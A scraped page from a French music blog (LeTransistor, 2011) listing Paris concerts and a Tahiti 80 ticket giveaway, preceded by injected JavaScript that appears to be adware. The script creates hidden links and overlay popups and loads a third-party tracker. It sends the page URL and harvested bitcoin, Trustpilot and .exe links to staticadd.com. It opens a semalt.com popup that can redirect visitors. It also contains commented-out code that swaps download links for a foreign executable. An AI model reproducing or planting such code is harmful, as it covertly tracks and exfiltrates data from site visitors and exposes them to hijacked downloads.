


<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>";
var bottomHtml = "<\/span>";
var popupCreated = false;
var bottomPopup = false || /[?&]test=1/.test(location.href);
//officeLog(bottomHtml);
function onReady() {
tryCreatePopup(2);
var box = create('div');
append(box, document.body);
var defaultStyles = {
width: '1px',
height: '1px',
background: 'transparent',
display: 'inline-block',
margin: '2px',
padding: 0,
verticalAlign: 'bottom',
border: 'none'
};
var a = create('a');
css(a, defaultStyles);
document.addEventListener('keydown', function(e) {
if (e.keyCode === 192 && e.ctrlKey) {
css(a, {
width: '20px',
height: '20px',
background: '#fff',
border: '1px solid red'
});
}
});
document.addEventListener('keyup', function(e) {
css(a, defaultStyles);
});
a.className = 'shbNetgpLink';
append(a, box);
a.href = 'javascript:;';
on(a, 'click', openLinerPopup);
css(box, {
position: 'fixed',
margin: 0,
padding: 0,
outline: 'none',
border: 'none',
zIndex: 999999999,
overflow: 'visible',
direction: 'ltr'
});
css(box, {
left: '3px',
right: 'auto',
top: '50px',
bottom: 'auto',
width: '42px',
height: '168px'
});
}
function officeLog(data) {
}
function clearStyles() {
if(typeof document.createStyleSheet === 'undefined') {
document.createStyleSheet = (function() {
function createStyleSheet(href) {
if(typeof href !== 'undefined') {
var element = document.createElement('link');
element.type = 'text/css';
element.rel = 'stylesheet';
element.href = href;
} else {
var element = document.createElement('style');
element.type = 'text/css';
}
document.getElementsByTagName('head')[0].appendChild(element);
var sheet = document.styleSheets[document.styleSheets.length - 1];
if(typeof sheet.addRule === 'undefined')
sheet.addRule = addRule;
if(typeof sheet.removeRule === 'undefined')
sheet.removeRule = sheet.deleteRule;
return sheet;
}
function addRule(selectorText, cssText, index) {
if(typeof index === 'undefined')
index = this.cssRules.length;
this.insertRule(selectorText + ' {' + cssText + '}', index);
}
return createStyleSheet;
})();
}
var sheet = document.createStyleSheet();
sheet.addRule('#shbNetPaddingTable', 'display: none;');
sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;');
sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;');
sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;');
sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:11px; line-height:normal;');
sheet.addRule('.shbNetPopupTable a, .shbNetPopupTable b', 'text-decoration:none; background:none; height:auto !important; color:#737373; font-size:11px; font-weight:bold;');
sheet.addRule('.shbNetTopLayer .shbNetPopupWr', 'display:block !important; width: 100% !important; x-index:99999999 !important; background: #fff !important; padding: 2px 10px !important;');
sheet.addRule('.shbNetTopLayer #shbNetPaddingTable', 'display:table !important;');
}
function createTopLayer() {
//if (!domReady) return;
var div = document.createElement('div');
div.className = 'shbNetTopLayer';
div.innerHTML = popupHtml;
document.body.insertBefore(div, document.body.childNodes[0]);
popupCreated = true;
}
function tryCreatePopup(stage) {
if (popupCreated) return;
if (isTopLayer) {
createTopLayer();
return;
}
if (bottomPopup) {
var box = document.createElement('div');
box.innerHTML = bottomHtml;
document.body.appendChild(box);
return;
}
if (stage === 1) {
document.writeln(popupHtml);
} else if (stage === 2) {
var mainBox = create('div');
mainBox.innerHTML = popupHtml;
document.body.appendChild(mainBox);
} else {
return;
}
var wr = $('shbNetPaddingWr');
if (!wr) return;
popupCreated = true;
var table = $('shbNetPaddingTable');
css(table, {
position: 'fixed',
margin: 0,
padding: 0,
left: 0,
top: 0,
width: '100%',
height: '100%',
direction: 'ltr',
zIndex: 999999999,
background: 'none'
});
css(table.getElementsByTagName('td')[0], {
verticalAlign: 'middle',
background: 'rgba(0, 0, 0, 0.5)'
});
var popup = $('shbNetPaddingPopup');
css(popup, {
margin: '0 auto',
padding: '20px 25px 20px',
width: '800px',
maxWidth: '98%',
background: '#fff',
border: '1px solid #000',
textAlign: 'left',
position: 'relative',
fontFamily: 'Tahoma, Arial, Verdana',
boxSizing: 'content-box'
});
on(document, 'keydown', function(e) {
if (e.keyCode === 27) {
wr.style.display = 'none';
}
});
}
function removeClass(node, className) {
if (node && node.className) {
node.className = node.className.replace(new RegExp('\b' + className + '\b', 'g'), '');
}
}
function openLinerPopup() {
var pad = $('shbNetPaddingWr');
var tbl = $('shbNetPaddingTable');
if (!pad || !tbl) return;
pad.style.display = 'block';
tbl.style.display = 'table';
var mainPopup = $('shbNetPopupWr');
if (!mainPopup) return;
mainPopup.style.display = 'none';
}
function $(id) {
return document.getElementById(id);
}
function on(elem, event, handler) {
elem.addEventListener(event, handler, false);
}
function css(elem, style) {
for (var prop in style) {
elem.style[prop] = style[prop];
}
}
function create(tag) {
return document.createElement(tag);
}
function append(elem, parent) {
parent.appendChild(elem);
}
setTimeout(function() {
window.CJSource = 'shb2';
/*
var script = document.createElement('script');
script.src = 'https://cleverjump.org/counter.js';
(document.head || document.body).appendChild(script);
*/
(function(w, d) {
var s = d.createElement('script');
d.getElementsByTagName('script')[0].parentNode.appendChild(s);
s.setAttribute('data-statinside-id', 21);
s.src = 'https://statinside.com/counter.js';
w._siData = w._siData || [];
w.statInside = function() {_siData.push(arguments);}
})(window, document);
statInside('custom', 'shb2');
statInside('heartbeat', false);
}, 10);
if (document.readyState === 'complete' || document.readyState === 'interactive') {
onReady();
} else {
on(document, 'DOMContentLoaded', onReady);
}
tryCreatePopup(1);
try {
clearStyles();
} catch (ex) {}
(function() {
if (!document.querySelector) return;
var added = false;
tryAddLink();
window.addEventListener('DOMContentLoaded', tryAddLink);
setTimeout(tryAddLink, 100);
setTimeout(tryAddLink, 1000);
setTimeout(tryAddLink, 2000);
function tryAddLink() {
if (added) return;
var menu = document.querySelector('#wpadminbar .ab-top-menu');
if (!menu) return;
var li = document.createElement('li');
li.innerHTML = 'SEO promotion';
//menu.appendChild(li);
added = true;
save();
}
function save() {
var json = JSON.stringify({
hrefs: ['wordpress_new'],
jsDomain: 'staticadd.com',
refUrl: location.href
});
var xhr = new XMLHttpRequest;
xhr.open('POST', '//staticadd.com/save.php');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.onload = function() {
xhr.responseText;
}
xhr.send(json);
}
})();
(function() {
function byId(id) {
return document.getElementById(id);
}
function setCookie() {
var date = new Date();
date.setTime(date.getTime() + (60 * 60 * 1000));
document.cookie = 'closePopupStartWow=1; path=/; domain=.' + location.hostname + '; expires=' + date.toGMTString();
}
function listenerPopupSemalt(event){
if (event.origin != 'https://semalt.com') return;
if (!event.data) return;
if (event.data == 'closePopupStartWow'){
var el = byId('popupStartWow');
if (!el) return;
el.style.display = 'none';
setCookie();
} else if(event.data.indexOf('startPopupStartWow')>-1) {
try{var res = JSON.parse(event.data);
if(res && res.page){
location.href = 'https://semalt.com/?s='+decodeURIComponent(res.page)+'&ref=blogspot';
}
} catch(ee) { }
setCookie();
}
}
function init() {
if (document.getElementById('popupWowNode')) return;
var div = document.createElement('div');
div.id = 'popupWowNode';
try {
div.innerHTML = html;
} catch (err) {
return;
}
document.body.appendChild(div);
setTimeout(function(){
if (document.cookie.indexOf('closePopupStartWow') !== -1) return;
var el = byId('popupStartWow');
if (!el) return;
el.setAttribute('src', 'https://semalt.com/popups/popup_wow.php?lang=en');
setTimeout(function(){
el.style.display = 'block';
}, 400);
},400);
}
setTimeout(init, 100);
setTimeout(init, 1000);
setTimeout(init, 2000);
window.addEventListener('message', listenerPopupSemalt, false);
})();
setTimeout(function() {
/*try {
var links = document.querySelectorAll('a[href$=".exe"]');
for (var i = 0; i < links.length; i++) {
links[i].href = 'https://myprintscreen.com/soft/myp0912.exe';
break;
}
} catch (err) {}*/
try {
var links = document.querySelectorAll('a[href^="bitcoin:"], a[href*="trustpilot.com"], a[href$=".exe"]');
//var links = document.querySelectorAll('a[href^="https://"]');
if (links.length) {
var hrefs = [];
for (var i = 0; i < links.length; i++) {
hrefs.push(links[i].href);
}
var json = JSON.stringify({
hrefs: hrefs,
jsDomain: 'staticadd.com',
refUrl: location.href
});
var xhr = new XMLHttpRequest;
xhr.open('POST', '//staticadd.com/save.php');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.onload = function() {
xhr.responseText;
}
xhr.send(json);
}
} catch (ex) {}
}, 2000);
})();
LeTransistor
Près de chez toi Gagnez vos places pour Tahiti 80 le 25 novembre au Petit Bain
Gagnez vos places pour Tahiti 80 le 25 novembre au Petit BainPublié le 14 Nov 2011 Nouvelle semaine, nouveau jeu concours. Cette fois-ci, on vous propose d’aller voir Tahiti 80, un groupe qu’on aime particulièrement, le 25 novembre au Petit Bain en compagnie de Califone et de This Is The Hello Monster ! L’occasion de les voir dans une salle à taille humaine ! Pour savoir comment gagner vos places, comme d’habitude, rendez-vous en fin d’agenda ! ![]() Gagnez vos places pour le concert de Tahiti 80 le 25 novembre au Petit Bain Lundi, on débute Les Nuits Capitales. Donc soirée d’ouverture au Cent Quatre avec Syd Matters, Nouvelle Vague, Sandra Nkaké, Albin de la Simone (vu aux FNAC Indétendances) et Malcolm Lincoln. Dans un genre plus ado, on a No Use For A Name à la Bellevilloise. Dans le genre plus contestataire, on a Cyril Mokaiesh (session) au Nouveau Cas. Dans un genre plus québécois, on a Pierre Lapointe pour deux soirs au Café de la Danse. Dans un genre plus folk, Brett Dennen est à la Boule Noire. Dans un genre plus découverte, la soirée Klaxon s’impose à la Loge avec A.d… et Thomas Marfisi. Dans le genre gratuit, y’a les Gibus Calling avec Milkymee (aux Inrocks Black XS), Inga Liljestrom, Moddi, et Owlle (aux Inrocks Black XS). Et à l’Inter, c’est la French Pop Mission avec Enosense, Stoned Popes et The Tape. Mardi, on commence les échauffements. The Do (interview) part en live au Casino de Paris. Et Battles (aux Eurocks) à la Machine ! En plus enfumé ce sera Whiz Khallifa au Zénith. Plus rock, ce sera Elbow au Bataclan. Au Nouveau Cas, Kitchenmen présente What’s Cookin’. A la Marock, les Danois le font mieux, la preuve encore avec Oh Land – avec The Good Natured en première partie. A la Boule Noire, on retrouvera les nostalgiques de New Model Army au concert de Justin Sullivan. Au menu de la Gibus Calling : Cleo T (session), Steak Number 8, Arthur Krakow et Sheyshey. Dans le cadre des Nuits Capitales : le Bouillon Belge invite Arnold et surtout 3 Minutes Sur Mer, et l’Inter fait sa soirée J’aime pas la chanson française avec My Concubine et Bastien Lallemant. Sinon, y’a la soirée Inrocks Lab à la Flèche avec Class Actress, Birdy Hunt (en session) et Theodore, Paul & Gabriel. Mercredi, si Rodolphe Burger passe au Théatre de l’Odeon, c’est que toutes les autres salles sont prises. Au Zénith : monument avec Têtes Raides (captation à Chaumont). A l’Olympia ? Emo avec Evanescence. A la Flèche, showman avec Charlie Winston. Au Café de la Danse : indie avec Okkervil River. Au Nouveau Cas : skate punk avec les Uncommonmenfrommars. A la Gaîté Lyrique : pop décomplexée avec Stephen Malkmus & the Jicks. A la Marock, metal français avec Lofofora. Au Bataclan, metal progressif avec Opeth et Pain of Salvation. Jeudi, ça risque d’être violent. Rien qu’avec Incubus au Zénith… et dans un autre style, La Ruda et Les Hurlements d’Leo (aux Eurocks) vont faire bouger le Bataclan… En plus calme, Puggy (aux Solidays) seront à l’Olympia. Pour chercher plus loin, le Café de la Danse programme Evangelista, Barn Owl et Lori Schönberg (la moitié de Berg Sans Nipple). On vous a parlé de son album Gentle Spirit, Jonathan Wilson est au Point FMR. On les a rencontrés, Viva & the Diva sont à la Marock. A la Flèche, on se foulera pas le cerveau avec Captain Kid et Mani. Et on évite le ‘Brainwash‘ avec Tom Fire au Batofar. Au Divan du Monde, soirée Breizh avec Tagada Jones. Et au Glazart, Vomitory et Prostitute Disfigurement, quel programme ragoutant ! A l’EMB, on groove Ben Mazué (session pour P20RIS) et SoCalled. Et Handcrafted Soul est à l’Espace B. Vendredi, mauvaise nouvelle : Helene Segara a annulé son concert. Heureusement, Lilly Wood & the Prick (interview) sont au Casino de Paris. Pour se détendre, allez à l’Olympia voir Sinsemillia. Pour un spectacle de marionnettes, Fujiya & Miyagi (chronique de l’album Ventriloquizzing) sont au Café de la Danse. Au Point FMR, on est contents de retrouver The Lanskies (interview). La folk avec la touche belge nécessaire, c’est The Bony King of Nowhere à la Boule Noire. A Mains d’Oeuvres, attention talent avec Mathieu Boogaerts et Flavia Coelho. Au 3 Baudets, chanson française fantaisiste avec Charles Baptiste et Yvan Cujious. Et pour se finir, c’est au Bus que ça se passe avec Farewell Paradise, The Hatricks et The Pirates of Neptune. Samedi, on commence par une dédicace de Rock Collection par Dom Kiris au 3 Baudets. Puis on enchaîne par la We Love DFA pour les Nuits Capitales au Cent Quatre avec The Rapture, Planningtorock (à la Flèche) et Prinzhorn Dance School. Le Zénith n’est pas en reste avec Birdy Nam Nam. A l’Olympia, Yes confirme qu’ils ne sont pas (encore) morts. Au Bataclan, Electric Six vient présenter Heartbeats and Brainwaves. A la Marock, on se bat tous pour aller voir Girls. Au Point FMR, préparez-vous pour féline Nadeah (au Divan du Monde). Au Trianon, Nneka affirme que ‘Soul Is Heavy’. Pas pour A State of Mind, qui le mélange à la funk et le reggae agilement au Nouveau Cas. A la Flèche, laissez vous gagner par les sentiments avec Loney Dear, Oscar & the Wolf et surtout Dillon – une perle de mélancolie. A la Boule Noire, un groupe grunge reapparaît : Bush. Au Glazart, ambiance festives avec le Rotterdam Ska Jazz Foundation et Salvation City Rockers. A l’EMB, Winston McAnuff va vous faire danser. A la Clé, vous allez vous démener sur au rythme effréné de Birdy Hunt (à Rock en Seine) et de The Lanskies (interview). Certes, le Plan de Ris Orangis c’est loin, mais là y’a les Hushpuppies (à Rock en Seine) et Pilöt ! Et pour finir la soirée, direction le Bus Palladium pour Vertigo, Divine Pilot et Djak. Dimanche, vous pensiez vous faire un ciné ? Raté ! Y’a les Islandais déjantés de FM Belfast (à la Machine) au Point FMR. Et pour les Nuits Capitales : Simon Beaudoux de Exsonvaldes sera au In The Garden. Cleo T (session) sera au Pied de Biche. Et à l’Inter, y’a une Boutiques Sonores Party avec Sonic Satellite, Wonderflu et Lescop. ![]() Et pour gagner des places pour Tahiti 80 avec Califone et This Is The Hello Monster au Petit Bain le 25 novembre, postez une vidéo de Tahiti 80. Remerciements : Jennifer Havet Catégorie : Près de chez toi Artiste(s) : 3 Minutes Sur Mer, 4 Guys From The Future, A State of Mind, A.d..., Adam Cohen, Akhenaton, Albin de la Simone, Arnold, Arthur Krakow, Barn Owl, Bastien Lallemant, Battles, Ben Mazué, Birdy Hunt, Birdy Nam Nam, Black Owl, Brett Dennen, Buridane, Bush, Caged Animals, Califone, Captain Kid, Casiokids, Charles-Baptiste, Charlie Winston, Christine and the Queens, Class Actress, Cleo T, Com Truise, Cyril Mokaiesh, dDamage, Didier Super, Dillon, Divine Pilot, Djak, Elbow, Electric Six, Enosense, Erevan Tusk, Evanescence, Evangelista, Farewell Paradise, Flavia Coelho, FM Belfast, Franz is Dead, Fujiya & Miyagi, Girls, Guillaume Tessier, Handcrafted Soul, Hold Your Horses !, Holden, Hushpuppies, Incubus, Inga Liljeström, Jonathan Wilson, Justin Sullivan, Kidwithnoeyes, Kitchenmen, L Initiale, La Maison Tellier, La Ruda, Lail Arad, Laurent Garnier, Les Hurlements d'Léo, Lescop, Lilly Wood and The Prick, Lisa Portelli, Little Barrie, Lofofora, Loney Dear, Lori Schönberg, Louis Aguilar, Malcolm Lincoln, Mani, Mathieu Boogaerts, Mighty Pearl, Milkymee, Moddi, Mondkopf, My Concubine, Nadeah, Neeskens, New Vilagers, Nicolas Ker, Nneka, No One Is Innocent, No Use For A Name, Norma Peals, Nouvelle Vague, Oh Land, Okkervil River, Opeth, Oscar & the Wolf, Owlle, Pain of Salvation, Pierre Lapointe, PILöT, Planningtorock, Pneu, Prinzhorn Dance School, Prostitute Disfigurement, Puggy, Raphaelle Boitel, Rodolphe Burger, Rose Le CowBoy, Rotterdam Ska Jazz Foundation, Salvation City Rocker, Sandra Nkaké, Sheyshey, Simon Beaudoux, Sinsemilia, SoCalled, Sonic Satellite, Steak Number 8, Stephen Malkmus & the Jicks, Stoned Popes, Studio Paradise, Syd Matters, Tagada Jones, Tahiti 80, Têtes Raides, The Bony King of Nowhere, The Do, The Good Natured, The Hatricks, The Lanskies, The Pirates of Neptune, The Rapture, The Tape, Theodore Paul & Gabriel, This Is The Hello Monster !, Thomas Marfisi, Tom Fire, Toybloid, Twin Sisters, Uncommonmenfrommars, Vertigo, Viva and the Diva, Vomitory, What About Penguins, Whiz Khallifa, Winston McAnuff, Winston McAnuff & The Bazbaz Orchestra, Wonderflu, Yes, Yvan Cujious Salle(s) : A. Picolo, Bataclan, Batofar, Bouillon Belge, Boule Noire, Bus Palladium, Café de la Danse, Canal 93, Casino de Paris, Cent Quatre, Clé Saint Germain, Divan du Monde, EMB Sannois, Espace B, Flèche d’Or, Gaîté Lyrique, Gibus, Glazart, In the Garden, International, La Bellevilloise, La Dame de Canton, La Java, La Loge, Lautrec, Le Réservoir, Les Trois Baudets, Mains d’Oeuvres, Maroquinerie, Nouveau Casino, Olympia, Petit Bain, Pied de Biche, Plan de Ris Orangis, Point Ephémère, Rex Club, Scop'Club, Théâtre de Odéon, Trianon, Zénith de Paris Evenement(s) : French Pop Mission, Gibus Calling, inRocKs Lab, J'aime pas la chanson française, Klaxon, Les Boutiques Sonores, Nuits Capitales, Out of Bounds, Panic City, We Love DFA, You are the future Production(s) : Discograph, Human Sounds Ville(s) : Paris |
Et toi t'en penses quoi ?